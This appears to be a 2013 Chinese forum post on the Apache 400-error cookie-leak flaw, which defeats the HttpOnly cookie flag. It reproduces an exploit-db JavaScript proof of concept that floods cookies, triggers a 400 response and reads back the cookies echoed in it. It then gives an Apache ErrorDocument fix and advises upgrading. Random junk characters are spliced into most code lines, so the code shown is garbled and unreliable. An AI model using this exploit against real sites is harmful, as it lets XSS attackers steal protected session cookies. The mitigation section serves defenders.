很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
% u v. P' \. u, H/ _7 a) p: h- ]2 v- _7 h- A
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
2 L, D4 h, k4 e. J
% X j) P% {- J# {+ U |6 f5 M/ U% W2 l* u, h \' K g( q( J6 [
// http://www.exploit-db.com/exploits/18442/
4 b3 _( x$ B( s- ?5 ^1 @ afunction setCookies (good) {; x# X* Z0 z# ~
// Construct string for cookie value
. e7 K8 z& z2 w3 l4 Vvar str = "";
8 r7 q& B5 q4 N. efor (var i=0; i< 819; i++) {
) ?& |) x* c D+ |# G4 Estr += "x";
& `, d& n/ }% X# S}
7 l, J" ^) P+ A: B// Set cookies
$ K/ D$ L1 M- e1 a tfor (i = 0; i < 10; i++) {
" v- G, G. B# E; g5 z* c// Expire evil cookie
9 _0 ?8 c/ ], T+ g4 m# L2 |if (good) {# p/ B+ b) q! a' c
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";9 e2 ~6 f/ _2 h# j4 T
}" Q& l9 ?/ m7 K _; p- \0 B
// Set evil cookie1 Z- v R8 r# x0 D/ o0 F
else {
3 d& @7 c) a: E! B& }var cookie = "xss"+i+"="+str+";path=/";( X0 P! _- _# G& H3 F' j
}
/ [$ _" N" j9 z0 Edocument.cookie = cookie;
" n( t. d* A3 v6 w; _/ Q} n2 U: w/ e6 {( S! T$ I, _' o/ j
}
, i: K& @+ e8 b1 B( ufunction makeRequest() {
, T3 |4 M, R; H7 fsetCookies();
1 E9 R, s- u T Kfunction parseCookies () {
; f9 t+ y% D* |. r. ]var cookie_dict = {};0 q/ }4 C, U$ ^8 X
// Only react on 400 status& }1 B, O- A& f3 u
if (xhr.readyState === 4 && xhr.status === 400) {: }: E- J; F9 o9 U. ]; P1 a
// Replace newlines and match <pre> content6 C U; B7 g0 M
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
3 _% S6 |# i# {3 R7 t% h1 h% U# nif (content.length) {
$ k* v6 d# L% U* o! L8 m' e// Remove Cookie: prefix
j/ Q4 S6 b0 Hcontent = content[1].replace("Cookie: ", "");3 R. F+ L, w. a' j8 E
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
3 r/ B! [+ o3 c2 j6 I6 B& U// Add cookies to object
1 w g7 f0 j1 H" z* V% jfor (var i=0; i<cookies.length; i++) {
' G8 ?# |! o1 a( Cvar s_c = cookies.split('=',2);. t$ ?# V0 v- L, v
cookie_dict[s_c[0]] = s_c[1];
% a4 {; l2 g8 k, ]' z}
* [$ h7 ^8 G6 |9 a) [}* q1 \- V3 |. }; f/ A
// Unset malicious cookies9 r. @* S; C Z( C5 ~" {: M5 j1 e) z
setCookies(true);
! I2 V; s- y& ^# Dalert(JSON.stringify(cookie_dict));# U1 ^& {3 G b, J. |% D& G
}9 W+ Q' l( D1 \+ Z+ P% M* s
}
1 Q. g7 ?9 M; Z6 H, M& q# X// Make XHR request
8 w: K! _: C6 k# [* n% w' Xvar xhr = new XMLHttpRequest();
4 }% b4 j' O) c, [. J7 F( `xhr.onreadystatechange = parseCookies;
1 E2 z% f- W8 `! D) xxhr.open("GET", "/", true);
; U1 r% W8 T% T9 O; K$ `2 gxhr.send(null);4 |4 X% k6 U( }
}
( }" J: b; K Y7 [9 D( _8 RmakeRequest();
! P' W) A! r/ H; M: E: D% p; ?) q' H1 o4 f, J% r
你就能看见华丽丽的400错误包含着cookie信息。
+ C5 Z! |2 H$ o( o1 _! @7 a. h9 x) }" p; T" k) U$ V$ g0 s
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#+ f4 p8 J) I. ]4 M& l
# }* c$ R8 q, I; v; }
修复方案: H$ q7 E9 m$ Y. t2 }, E7 r, L
( }: h. t8 j* Q3 pApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
& [. i' U- Y' m- U1 q; a4 `1 [5 _1 A: P: p
In the event of a problem or error, Apachecan be configured to do one of four things,4 f: V+ y% T2 P0 ^& _% x- B- f
6 h& j5 z; K/ m& I. A8 G1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
) s2 \( R8 l7 Z2. output acustomized message输出一段信息
; ` W5 J9 ~0 n t1 G& z6 q3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 9 B' g6 T0 P1 s& v% A: l& v
4. redirect to an external URL to handle theproblem/error转向一个外部URL
" e7 N: x5 O4 }$ O9 U( A3 q
/ [, @" C% n& c' N1 @0 \! v& c经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
5 p$ v1 y4 @, k. W; M' F( t/ P
5 B" x, B& q* Z8 F. }9 lApache配置:, y/ y+ j0 V- t3 C! ^) g( e- q1 h
- t, Y3 h. R/ W7 A2 FErrorDocument400 " security test"& p' Z; X. T- U( a# |* X
! r2 Y" }- Y( u, x) `) _# C1 O
当然,升级apache到最新也可:)。% d1 l, S# a, ~
+ |( i$ F% F* `/ D4 Y# ?参考:http://httpd.apache.org/security/vulnerabilities_22.html: @5 ?+ l T2 I& a K1 ~2 j9 Y
, Z- @9 x3 O; _* } |
发表于 2013-4-19 19:15:43
收藏
支持
反对